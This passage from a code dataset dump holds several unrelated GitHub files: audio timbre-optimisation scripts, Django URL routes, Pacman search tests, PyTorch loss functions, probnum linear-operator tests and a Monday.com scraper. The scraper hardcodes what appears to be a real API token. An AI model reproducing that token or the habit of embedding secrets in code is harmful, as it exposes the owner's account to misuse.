training.kernel_optim(tab_red, dissimil_mat, **optim_args)\n\n\ndef run_optimization(optim_args={}):\n for i, tsp in enumerate(sorted(timbrespace_db.keys())):\n print('Processing', tsp)\n log_foldername = 'outs_all/' + tsp.lower()\n subprocess.call(['mkdir', '-p', log_foldername])\n for rs in representations:\n rslog_foldername = log_foldername + '/' + rs + '-' + time.strftime(\n '%y%m%d@%H%M%S')\n subprocess.call(['mkdir', '-p', rslog_foldername])\n optim_args['log_foldername'] = rslog_foldername\n run_once(tsp, rs, optim_args)\n\n\ndef run_all():\n optim_args = {\n 'cost': 'correlation',\n 'loss': 'exp_sum',\n 'init_sig_mean': 1.0,\n 'init_sig_var': 0.01,\n 'num_loops': 50000,\n 'learning_rate': 0.5,\n 'log_foldername': './',\n 'logging': True\n }\n run_optimization(optim_args)\n\n\ndef 
grid_search_lr():\n    for learning_rate in [1.0, 0.1, 0.01, 0.001]:\n        for n_test in range(5):\n            print('***', learning_rate, n_test + 1)\n            optim_args = {\n                'cost': 'correlation',\n                'loss': 'loglikelihood',\n                'init_sig_mean': 1.0,\n                'init_sig_var': 1.0,\n                'num_loops': 40000,\n                'learning_rate': learning_rate,\n                'log_foldername': './',\n                'logging': True\n            }\n            run_optimization(optim_args)\n\n\ndef resume_all(resumefn='./outs/'):\n    for i, tsp in enumerate(sorted(timbrespace_db.keys())):\n        print('Processing', tsp)\n        dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n        for rs in representations:\n            # for el in dir_names:\n            #     if el[1].split('-')[0] == tsp.lower() and el[1].split(\n            #             '-')[1] == rs:\n            rslog_foldername = './outs/' + tsp.lower() + '/' + rs\n            if os.path.isdir(rslog_foldername):\n                # retrieve_foldername = os.path.join(el[0], el[1])\n                training.resume_kernel_optim(\n                    rslog_foldername,\n                    rslog_foldername,\n                    num_loops=100000,\n                    logging=True)\n            else:\n                subprocess.call(['mkdir', '-p', rslog_foldername])\n                # run_once expects an optim_args dict; pass at least the log folder\n                run_once(tsp, rs, {'log_foldername': rslog_foldername})\n\n\ndef resume_some(tsps=None, reps=None, verbose=True):\n    tspaces = tsps if tsps is not None else timbrespace_db.keys()\n    some_reps = reps if reps is not None else representations\n    for i, tsp in enumerate(sorted(tspaces)):\n        print('Processing', tsp)\n        dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n        for rs in some_reps:\n            rslog_foldername = './outs_all/' + tsp.lower() + '/' + rs\n            if os.path.isdir(rslog_foldername):\n                resume = {}\n                loop_id = []\n                for root, dirs, files in os.walk(rslog_foldername):\n                    for name in files:\n                        if name.split('.')[-1] == 'pkl' and 'optim_process' in name.split('.')[0]:\n                            loop_id.append(int(name.split('.')[0].split('=')[-1]))\n\n                # the most recent loop index must be known before its pickle can be loaded\n                retrieved_loop = np.max(loop_id)\n                optim_process = pickle.load(open(os.path.join(rslog_foldername, 'optim_process_l={}.pkl'.format(retrieved_loop)), 'rb'))\n                optim_config = pickle.load(open(os.path.join(rslog_foldername, 'optim_config.pkl'), 'rb'))\n                dataset = pickle.load(open(os.path.join(rslog_foldername, 'dataset.pkl'), 'rb'))\n\n                input_data = dataset['data_proj']\n                target_data = dataset['dissimilarities']\n\n                resume['retrieved_loop'] = retrieved_loop\n                resume['init_seed'] = optim_config['seed']\n\n                if verbose:\n                    print(\"* resuming with '{}' of size {}\".format(rslog_foldername.split('/')[-1], input_data.shape))\n\n                init_seed = optim_config['seed']\n                cost = optim_config['args']['cost']\n                init_sig_mean = optim_config['args']['init_sig_mean']\n                init_sig_var = optim_config['args']['init_sig_var']\n                training.resume_kernel_optim(\n                    rslog_foldername,\n                    rslog_foldername,\n                    num_loops=100000,\n                    logging=True)\n\n\ndef nonopt_correlations():\n    corr_results = {}\n    for i, tsp in enumerate(timbrespace_db.keys()):\n        print('Processing', tsp)\n        corr_results[tsp] = {}\n        target_data = load.timbrespace_dismatrix(tsp, timbrespace_db)\n        for rs in sorted(representations):\n            aud_repres = load.timbrespace_features(\n                tsp,\n                representations=[rs],\n                window=None,\n                timbrespace_db=None,\n                verbose=False)[rs]\n            tab_red = []\n            rs_type = rs.split('_')[-1]\n            if rs_type == 'strf':\n                n_components = 1\n                for i in range(len(aud_repres)):\n                    # print('PCA on sound %02i' % (i + 1))\n                    # pca.pca returns (data, mapping, variances); keep only the projected data\n                    strf_reduced, _, _ = pca.pca(\n                        np.absolute(aud_repres[i]),\n                        aud_repres[i].shape[1],\n                        n_components=n_components)\n                    strf_reduced = strf_reduced.flatten()\n                    tab_red.append(strf_reduced / np.max(strf_reduced))\n                tab_red = np.transpose(np.asarray(tab_red))\n            elif rs_type == 'spectrogram' or rs_type == 'mps':\n                for i in range(len(aud_repres)):\n                    tab_red.append(aud_repres[i].flatten())\n                tab_red = 
np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrum':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i])\n # 128 x nb sounds (time or freq?)\n tab_red = np.transpose(np.asarray(tab_red))\n input_data = tab_red / np.mean(np.std(tab_red, axis=0))\n\n # plt.plot(input_data)\n # plt.show()\n ndims, ninstrus = input_data.shape[0], input_data.shape[1]\n no_samples = ninstrus * (ninstrus - 1) / 2\n idx_triu = np.triu_indices(target_data.shape[0], k=1)\n target_v = target_data[idx_triu]\n mean_target = np.mean(target_v)\n std_target = np.std(target_v)\n kernel = np.zeros((ninstrus, ninstrus))\n for i in range(ninstrus):\n for j in range(i + 1, ninstrus):\n kernel[i, j] = np.sum(\n np.power(input_data[:, i] - input_data[:, j], 2))\n kernel_v = kernel[idx_triu]\n mean_kernel = np.mean(kernel_v)\n std_kernel = np.std(kernel_v)\n Jn = np.sum(\n np.multiply(kernel_v - mean_kernel, target_v - mean_target))\n Jd = (no_samples - 1) * std_target * std_kernel\n corr_results[tsp][rs] = Jn / Jd\n print(' {} : {}'.format(rs, Jn / Jd))\n pickle.dump(corr_results, open('correlations_results.pkl', 'wb'))\n\n\nif __name__ == '__main__':\n # resume_all()\n # run_all()\n # nonopt_correlations()\n # run_optimization()\n # resume_all()\n grid_search_lr()\n","repo_name":"happyhousehold/timbreStudies","sub_path":"python/script_analyse_folder_strf.py","file_name":"script_analyse_folder_strf.py","file_ext":"py","file_size_in_byte":9494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69965475937","text":"\"\"\"Django_EventManager_WebApp URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.urls import path\r\nfrom labour_management_system import views\r\n\r\nurlpatterns = [\r\n path('', views.home, name='home'),\r\n path('home', views.home, name='home'),\r\n path('district', views.district, name='district'),\r\n path('person', views.person, name='person'),\r\n path('supervisor', views.supervisor, name='supervisor'),\r\n path('perform', views.perform, name='perform'),\r\n path('showDistrict', views.showDistrict, name='showDistrict'),\r\n path('showPerson', views.showPerson, name='showPerson'),\r\n path('showSupervisor', views.showSupervisor, name='showSupervisor'),\r\n path('editDistrict', views.editDistrict, name='editDistrict'),\r\n path('editPerson', views.editPerson, name='editPerson'),\r\n path('editSupervisor', views.editSupervisor, name='editSupervisor'),\r\n path('deleteDistrict', views.deleteDistrict, name='deleteDistrict'),\r\n path('deletePerson', views.deletePerson, name='deletePerson'),\r\n path('deleteSupervisor', views.deleteSupervisor, name='deleteSupervisor'),\r\n]\r\n","repo_name":"harshpatel2212/Labour-Management-System","sub_path":"labour_management_system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34684352384","text":"import os, time, sys, shutil\r\ndir_common = 'D:/code/python/common/'\r\nif not dir_common in sys.path:\r\n sys.path.append(dir_common)\r\nimport numpy as np\r\n \r\nimport MyHelper as mh\r\nimport perf_eval_helper as peh\r\n\r\n\r\n#==============================================================================\r\n\r\n\r\n# inputs \r\nfn_lis_ann = 'D:/projects/025_candidate_detection/lis/lis_ann_all_tr.txt'\r\ndir_det = 'D:/projects/023_dev_test/PFAI_30_Dev_Train/hologic/'\r\n\r\n#fn_lis_ann = 'D:/projects/025_candidate_detection/lis/lis_ann_all_ts.txt'\r\n#dir_det = 'D:/projects/023_dev_test/PFAI_30_Dev_Test/output_v2.1/hologic/'\r\n\r\n# outputs:\r\n\r\ndir_det_tgt = 'D:/projects/025_candidate_detection/data/det/hologic/'\r\n\r\n\r\ndir_det = dir_det_tgt\r\n\r\n\r\nfn_log = (os.path.basename(__file__)).replace('.py', '.log.txt')\r\n\r\n#==============================================================================\r\n# NO NEED TO CHANGE BELOW THIS LINE\r\n#==============================================================================\r\ntime_start = time.time()\r\n\r\nlis_ann = mh.ReadLisFile(fn_lis_ann)\r\nn_ann = len(lis_ann)\r\n\r\nfor n in range(n_ann):\r\n ann = lis_ann[n]\r\n #print('[%4d/%4d] %s' % (n+1, n_ann, ann))\r\n \r\n tmp = ann[:ann.find('.')].split('_')\r\n case = tmp[0]\r\n view = tmp[3]+'_'+tmp[4]\r\n \r\n dir_case = dir_det + case + '/'\r\n if not os.path.exists(dir_case):\r\n mh.print_log_msg(fn_log, 'case %s had no detections in %s' % (case, dir_det))\r\n continue\r\n \r\n dir_case_tgt = dir_det_tgt + case + '/'\r\n mh.mkdir(dir_case_tgt)\r\n \r\n fn_ydet = dir_case + '%s.%s.ydetects' % (case, view)\r\n if not os.path.exists(fn_ydet):\r\n mh.print_log_msg(fn_log, 'case %s view %s had no ydetects in %s' % (case, view, dir_det))\r\n continue\r\n \r\n if dir_det_tgt != dir_det:\r\n shutil.copy2(fn_ydet, dir_case_tgt) \r\n #break\r\n\r\nmh.print_log_msg(fn_log, 'run time = %.2f sec' % (time.time() - 
time_start))\r\n","repo_name":"jge502/hello-world","sub_path":"s004_get_cancer_ydetects.py","file_name":"s004_get_cancer_ydetects.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12626817756","text":"from problems import SingleFoodSearchProblem, MultiFoodSearchProblem, EightQueenProblem\nfrom searchAgents import bfs, dfs, ucs, astar, gbfs, Euclidean_heuristic, Manhattan_heuristic\n\n\ndef cau1_2():\n while True:\n try:\n number = int(input(\"Testcase:\\n1.Single01\\t2.Single02\\t3.Single03\\t4.Multi01\\t5.Multi02\\t6.Multi03\\n\"))\n if number == 1:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single01.txt\")\n algorithm1_2(problem)\n elif number == 2:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single02.txt\")\n algorithm1_2(problem)\n elif number == 3:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single03.txt\")\n algorithm1_2(problem)\n elif number == 4:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi01.txt\")\n algorithm1_2(problem)\n elif number == 5:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi02.txt\")\n algorithm1_2(problem)\n elif number == 6:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi03.txt\")\n algorithm1_2(problem)\n else:\n break\n except:\n break\n\n\ndef algorithm1_2(problem: SingleFoodSearchProblem or MultiFoodSearchProblem):\n while True:\n try:\n number = int(input(\"Algorithm:\\n1.BFS\\t2.DFS\\t3.UCS\\t4.AStar\\t5.GBFS\\n\"))\n if number == 1:\n path = bfs(problem)\n print(path)\n elif number == 2:\n path = dfs(problem)\n print(path)\n elif number == 3:\n path = ucs(problem)\n print(path)\n elif number == 4:\n heuristic = choose_heuristic()\n if heuristic == 1:\n path = astar(problem, Euclidean_heuristic)\n print(path)\n elif heuristic == 2:\n path = astar(problem, Manhattan_heuristic)\n print(path)\n elif number == 5:\n heuristic = choose_heuristic()\n if heuristic == 1:\n path = gbfs(problem, Euclidean_heuristic)\n print(path)\n elif heuristic == 2:\n path = gbfs(problem, Manhattan_heuristic)\n print(path)\n else:\n break\n except:\n break\n\n\ndef choose_heuristic():\n while True:\n number = int(input(\"Heuristic:\\n1.Euclidean\\t2.Manhattan\\n\"))\n if number == 1 or number == 2:\n return number\n\n\ndef cau3():\n while True:\n try:\n number = int(input(\"Testcase:\\n1.Queen01\\t2.Queen02\\t3.Queen03\\n\"))\n if number == 1:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens01.txt\")\n algorithm3(problem)\n elif number == 2:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens02.txt\")\n algorithm3(problem)\n elif number == 3:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens03.txt\")\n algorithm3(problem)\n else:\n break\n except:\n break\n\ndef algorithm3(problem):\n problem.print()\n problem.__newinit__()\n print(problem.h([0, 7]))\n problem.print_board()\n\n\n\n#cau1_2()\n#cau3()\n","repo_name":"maihathm/AI-MidTerm","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11628800852","text":"def fibonacci(limit): #enter a number 
that is half of the desired range\n    a = 1 #first terms of the fibonacci sequence\n    b = 1\n\n    for i in range(1, limit+1): #range isn't inclusive on upper limit\n        a+=b\n        b+=a #modelling the fibonacci sequence\n        print(a)\n        print(b)\n\nfibonacci(5) #testing the code with a range of 10 numbers\n","repo_name":"TomPettit7/Project-Euler","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43600833509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 21 10:14:38 2023\n\n@author: hcliffo\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom monday import MondayClient\n\ndef extract_visualizations():\n    \n    monday = MondayClient('eyJhbGciOiJIUzI1NiJ9.eyJ0aWQiOjIwMjg0NzE0NSwidWlkIjozMDk0NDE5OCwiaWFkIjoiMjAyMi0xMi0wMVQwNzoxODoxOS43ODBaIiwicGVyIjoibWU6d3JpdGUiLCJhY3RpZCI6MTIyMTY1NDMsInJnbiI6InVzZTEifQ.Xk83t2dR3L01D679_WxfsVixFeXJJiCTKbRxY2dIIk0')\n    cols = monday.boards.fetch_columns_by_board_id([3272211806])\n    columns = [i['title'] for i in cols['data']['boards'][0]['columns']][1:]\n\n    items = monday.boards.fetch_items_by_board_id(3272211806)\n    ds = {}\n\n    for n,i in enumerate(items.get('data').get('boards')[0]['items']):\n\n        name = i['name']\n        info = pd.DataFrame(items.get('data').get('boards')[0]['items'][n]['column_values'])\n        info['value'] = columns\n        info = info.set_index('value')\n        info = info['text']\n        ds[name] = info\n    \n    ds = pd.concat(ds,axis=1)\n\n    ds = ds.T\n    ds = ds.reset_index()\n    ds = ds.rename(columns = {'index':'Name'})\n    ds = ds[['Name','User Resources','User Resources Completed', 'Link','Article Overview','Status']]\n    return ds\n\ndf = extract_visualizations()\n\nfor n,row in df.iterrows():\n    if row['User Resources']=='Complete Resources':\n        viz_link = row['Link']\n        viz = row['Name']\n        \n        page = requests.get(viz_link)\n        \n        soup = BeautifulSoup(page.content, \"html.parser\")\n        results = soup.find(\"h2\")\n        author = results.prettify()\n        viz_author = author.split('\\n ')[3][1:]\n        if not viz_author == 'visual':\n            print(viz)\n            print(viz_author)\n\n\n","repo_name":"visualizingenergy/website_codes","sub_path":"Check_Monday_Authors.py","file_name":"Check_Monday_Authors.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36279837068","text":"'''\nThis .py defines the loss functions.\n'''\nimport torch\nimport torch.nn as nn\n\nclass buildLosses(object):\n    def __init__(self, cuda=True, batch_average=True, ignore_index=255, ):\n        self.cuda = cuda\n        self.batch_average = batch_average\n        self.ignore_index = ignore_index\n\n    def build_loss(self, mode='ce'):\n        \"\"\"Choices: ['ce' or 'focal']\"\"\"\n        if mode == 'ce':\n            return self.CrossEntropyLoss\n        elif mode == 'focal':\n            return self.FocalLoss\n        # 1. To add a new loss, add an elif branch here.\n        # 2. Then define the function for the loss you want to add below.\n        else:\n            raise NotImplementedError\n\n    def CrossEntropyLoss(self, logit, target):\n        n, c, h, w = logit.size()\n        criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)\n\n        if self.cuda:\n            criterion = criterion.cuda()\n\n        loss = criterion(logit, target.long())\n\n        if self.batch_average:\n            loss /= n\n\n        return loss\n\n    def FocalLoss(self, logit, target, gamma=2, alpha=0.5):\n        n, c, h, w = logit.size()\n        criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)\n\n        if self.cuda:\n            criterion = criterion.cuda()\n\n        logpt = -criterion(logit, target.long())\n        pt = torch.exp(logpt)\n\n        if alpha is not None:\n            logpt *= alpha\n\n        loss = -((1 - pt) ** gamma) * logpt\n\n        if self.batch_average:\n            loss /= n\n\n        return loss\n\n# For checking, standalone, that the loss functions in this .py work correctly\nif __name__ == \"__main__\":\n    loss = buildLosses(cuda=True)\n    a = torch.rand(1, 3, 7, 7).cuda()\n    b = torch.rand(1, 7, 7).cuda()\n    print(loss.CrossEntropyLoss(a, b).item())\n    print(loss.FocalLoss(a, b, gamma=0, alpha=None).item())\n    print(loss.FocalLoss(a, b, gamma=2, alpha=0.5).item())\n\n\n\n\n","repo_name":"brstar96/KHD_Paten","sub_path":"utils/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"38683887419","text":"\"\"\"Tests for linear operator arithmetics.\"\"\"\n# pylint: disable=consider-iterating-dictionary\n\nimport itertools\n\nimport numpy as np\nimport pytest\n\nfrom probnum import config\nfrom probnum.linops._arithmetic import _add_fns, _matmul_fns, _mul_fns, _sub_fns\nfrom probnum.linops._arithmetic_fallbacks import (\n    NegatedLinearOperator,\n    ProductLinearOperator,\n    ScaledLinearOperator,\n    SumLinearOperator,\n)\nfrom probnum.linops._kronecker import (\n    IdentityKronecker,\n    Kronecker,\n    SymmetricKronecker,\n    Symmetrize,\n)\nfrom probnum.linops._linear_operator import (\n    Embedding,\n    Identity,\n    Matrix,\n    Selection,\n    TransposedLinearOperator,\n    _InverseLinearOperator,\n    _TypeCastLinearOperator,\n)\nfrom probnum.linops._scaling import Scaling, Zero\nfrom probnum.problems.zoo.linalg import random_spd_matrix\n\n\ndef _aslist(arg):\n    \"\"\"Converts anything to a list. 
Non-iterables become single-element lists.\"\"\"\n    try:\n        return list(arg)\n    except TypeError:  # excepts TypeError: '' object is not iterable\n        return [arg]\n\n\ndef get_linop(linop_type):\n    # pylint: disable=too-many-return-statements,too-complex,too-many-branches\n    if linop_type is Kronecker:\n        _A1 = np.ones((2, 2))\n        _B1 = np.ones((2, 3))\n        return (\n            Kronecker(_A1, np.random.rand(2, 2)),\n            Kronecker(np.random.rand(4, 3), _B1),\n            Kronecker(_A1, np.random.rand(2, 2)),\n            Kronecker(np.random.rand(2, 2), _B1),\n        )\n    elif linop_type is IdentityKronecker:\n        return (\n            IdentityKronecker(2, np.random.rand(2, 2)),\n            IdentityKronecker(3, np.random.rand(3, 4)),\n        )\n    elif linop_type is Zero or linop_type is Identity:\n        return (linop_type(shape=(4, 4)), linop_type(shape=(3, 3)))\n    elif linop_type is Scaling:\n        return (\n            Scaling(factors=np.random.rand(4)),\n            Scaling(factors=3.14, shape=(4, 4)),\n            Scaling(factors=np.random.rand(6), shape=(6, 6)),\n            Scaling(factors=3.14, shape=(3, 3)),\n        )\n    elif linop_type is Matrix:\n        return (Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(6, 3)))\n    elif linop_type is _InverseLinearOperator:\n        _posdef_randmat = random_spd_matrix(rng=np.random.default_rng(123), dim=4)\n        return Matrix(_posdef_randmat).inv()\n    elif linop_type is TransposedLinearOperator:\n        return TransposedLinearOperator(linop=Matrix(np.random.rand(4, 4)))\n    elif linop_type is Embedding:\n        return Embedding(take_indices=(0, 1, 2), put_indices=(1, 0, 3), shape=(4, 3))\n    elif linop_type is Selection:\n        return Selection(indices=(1, 0, 3), shape=(3, 4))\n    elif linop_type is NegatedLinearOperator:\n        return NegatedLinearOperator(linop=Matrix(np.random.rand(4, 4)))\n    elif linop_type is ScaledLinearOperator:\n        return ScaledLinearOperator(linop=Matrix(np.random.rand(4, 4)), scalar=3.14)\n    elif linop_type is ProductLinearOperator:\n        return ProductLinearOperator(\n            Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(4, 4))\n        )\n    elif linop_type is SumLinearOperator:\n        return SumLinearOperator(\n            Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(4, 4))\n        )\n    elif linop_type is SymmetricKronecker:\n        return SymmetricKronecker(Identity(2), Identity(2))\n    elif linop_type is Symmetrize:\n        return Symmetrize(2)\n    elif linop_type is _TypeCastLinearOperator:\n        return _TypeCastLinearOperator(\n            linop=Matrix(np.random.rand(4, 4)), dtype=np.float32\n        )\n    elif linop_type is np.number:\n        return 1.3579\n    else:\n        raise TypeError(f\"Don't know what to do with type {linop_type}.\")\n\n\ndef test_matmul():\n\n    for (l_type, r_type) in _matmul_fns.keys():\n        if (\n            l_type is Selection\n            or l_type is Embedding\n            or r_type is Selection\n            or r_type is Embedding\n        ):\n            # Checked separately\n            continue\n\n        linops1 = get_linop(l_type)\n        linops2 = get_linop(r_type)\n\n        for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n            if linop1.shape[1] != linop2.shape[0]:\n                with pytest.raises(ValueError):\n                    res_linop = linop1 @ linop2\n            else:\n                res_linop = linop1 @ linop2\n                assert res_linop.ndim == 2\n\n                if l_type is np.number:\n                    assert res_linop.shape == linop2.shape\n                elif r_type is np.number:\n                    assert res_linop.shape == linop1.shape\n                else:\n                    assert res_linop.shape[0] == linop1.shape[0]\n                    assert res_linop.shape[1] == linop2.shape[1]\n\n\ndef test_mul():\n    for (l_type, r_type) in _mul_fns.keys():\n        if (\n            l_type is Selection\n            or l_type is Embedding\n            or r_type is Selection\n            or r_type is Embedding\n        ):\n            # Checked separately\n            continue\n\n        linops1 = get_linop(l_type)\n        linops2 = get_linop(r_type)\n\n        for (linop1, 
linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n            if l_type is np.number:\n                res_linop = linop1 * linop2\n                assert res_linop.shape == linop2.shape\n            elif r_type is np.number:\n                res_linop = linop1 * linop2\n                assert res_linop.shape == linop1.shape\n            elif linop1.shape != linop2.shape:\n                with pytest.raises(ValueError):\n                    res_linop = linop1 * linop2\n            else:\n                res_linop = linop1 * linop2\n                assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_add():\n\n    for (l_type, r_type) in _add_fns.keys():\n        if (\n            l_type is Selection\n            or l_type is Embedding\n            or r_type is Selection\n            or r_type is Embedding\n        ):\n            # Checked separately\n            continue\n\n        linops1 = get_linop(l_type)\n        linops2 = get_linop(r_type)\n\n        for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n            if linop1.shape != linop2.shape:\n                with pytest.raises(ValueError):\n                    res_linop = linop1 + linop2\n            else:\n                res_linop = linop1 + linop2\n                assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_sub():\n\n    for (l_type, r_type) in _sub_fns.keys():\n        if (\n            l_type is Selection\n            or l_type is Embedding\n            or r_type is Selection\n            or r_type is Embedding\n        ):\n            # Checked separately\n            continue\n\n        linops1 = get_linop(l_type)\n        linops2 = get_linop(r_type)\n\n        for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n            if linop1.shape != linop2.shape:\n                with pytest.raises(ValueError):\n                    res_linop = linop1 - linop2\n            else:\n                res_linop = linop1 - linop2\n                assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_kronecker_matmul():\n    # Checks the case in which the shapes of the Kronecker-structured matrices\n    # are valid in itself but the respective Kronecker factors (k1.A @ k2.A and/or\n    # k1.B @ k2.B) have invalid shapes for matmul.\n    k1 = Kronecker(np.random.rand(4, 2), np.random.rand(2, 3)) # (8, 6)\n    k2 = Kronecker(np.random.rand(3, 2), np.random.rand(2, 3)) # (6, 6)\n\n    # Even though the shapes fit, and Kronecker @ Kronecker = Kronecker ....\n    assert k1.shape[1] == k2.shape[0]\n\n    # The result does not have a Kronecker structure\n    res = k1 @ k2\n    assert not isinstance(res, Kronecker)\n\n\ndef test_idkronecker_matmul():\n    # Checks the case in which the shapes of the Kronecker-structured matrices\n    # are valid in itself but the respective Kronecker factors (k1.A @ k2.A and/or\n    # k1.B @ k2.B) have invalid shapes for matmul.\n    k1 = IdentityKronecker(4, np.random.rand(2, 3)) # (8, 12)\n    k2 = IdentityKronecker(2, np.random.rand(6, 2)) # (12, 4)\n\n    # Even though the shapes fit, and\n    # IdentityKronecker @ IdentityKronecker = IdentityKronecker ....\n    assert k1.shape[1] == k2.shape[0]\n\n    # The result does not have an IdentityKronecker structure\n    res = k1 @ k2\n    assert not isinstance(res, IdentityKronecker)\n\n\ndef test_selection_embedding():\n    sel = get_linop(Selection)\n    emb = get_linop(Embedding)\n    emb2 = Embedding(\n        take_indices=emb._take_indices, put_indices=emb._put_indices, shape=(5, 3)\n    )\n\n    product1 = sel @ emb\n    assert product1.shape[0] == sel.shape[0]\n    assert product1.shape[1] == emb.shape[1]\n\n    product2 = sel @ emb2\n    assert product2.shape[0] == sel.shape[0]\n    assert product2.shape[1] == emb2.shape[1]\n\n\ndef test_lazy_matrix_matrix_matmul_option():\n    mat1 = get_linop(Matrix)[0]\n    mat2 = get_linop(Matrix)[0]\n    inv = get_linop(_InverseLinearOperator)\n    transposed = get_linop(TransposedLinearOperator)\n\n    with config(lazy_matrix_matrix_matmul=True):\n        assert isinstance(mat1 @ mat2, ProductLinearOperator)\n        assert isinstance(mat1 @ inv, 
ProductLinearOperator)\n assert isinstance(inv @ mat2, ProductLinearOperator)\n assert isinstance(mat1 @ transposed, ProductLinearOperator)\n assert isinstance(transposed @ mat2, ProductLinearOperator)\n\n with config(lazy_matrix_matrix_matmul=False):\n assert isinstance(mat1 @ mat2, Matrix)\n assert isinstance(mat1 @ inv, Matrix)\n assert isinstance(inv @ mat2, Matrix)\n assert isinstance(mat1 @ transposed, Matrix)\n assert isinstance(transposed @ mat2, Matrix)\n\n\ndef test_equality():\n scalings = get_linop(Scaling)\n int_scaling = Scaling(2, shape=(4, 4))\n for s1, s2 in itertools.product(scalings, _aslist(scalings) + [int_scaling]):\n if (\n s1.shape == s2.shape\n and s1.dtype == s2.dtype\n and np.all(s1.todense() == s2.todense())\n ):\n assert s1 == s2\n\n else:\n assert s1 != s2\n","repo_name":"probabilistic-numerics/probnum","sub_path":"tests/test_linops/test_arithmetics.py","file_name":"test_arithmetics.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"34"} +{"seq_id":"14716955696","text":"from . import views\nfrom django.urls import path\n\n\nurlpatterns=[\n path('',views.home),\n path('home',views.home),\n path('questionbank',views.viewquestions,name='select_questions'),\n path('result',views.Result,name='show_result_page'),\n path('enterquestions',views.enterquestions,name='insert_questions'),\n path('',views.enterquestions,name='update_question'),\n path('delete/',views.deletequestion,name='delete_question')\n\n]","repo_name":"bilalhussain1194/bestfitwork","sub_path":"besfit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9956056504","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score\nfrom sklearn.metrics import adjusted_rand_score as ari_score\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.cluster import KMeans\nfrom utils.faster_mix_k_means_pytorch import K_Means\nfrom utils.util import cluster_acc, Identity, AverageMeter, seed_torch, str2bool\nfrom data.omniglotloader import omniglot_alphabet_func, omniglot_evaluation_alphabets_mapping, omniglot_background_val_alphabets \nfrom models.vgg import VGG\nfrom tqdm import tqdm\nfrom collections import Counter\nimport random\nimport math\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\ndef estimate_k(model, unlabeled_loader, labeled_loaders, args):\n u_num = len(unlabeled_loader.dataset)\n u_targets = np.zeros(u_num) \n u_feats = np.zeros((u_num, 1024))\n print('extracting features for unlabeld data')\n for _, (x, _, label, idx) in enumerate(unlabeled_loader):\n x = x.to(device)\n _, feat = model(x)\n feat = feat.view(x.size(0), -1)\n idx = idx.data.cpu().numpy()\n u_feats[idx, :] = feat.data.cpu().numpy()\n u_targets[idx] = label.data.cpu().numpy()\n cand_k = np.arange(args.max_cand_k)\n #get acc for labeled data with short listed k\n best_ks = np.zeros(len(omniglot_background_val_alphabets))\n print('extracting features for labeld data')\n for 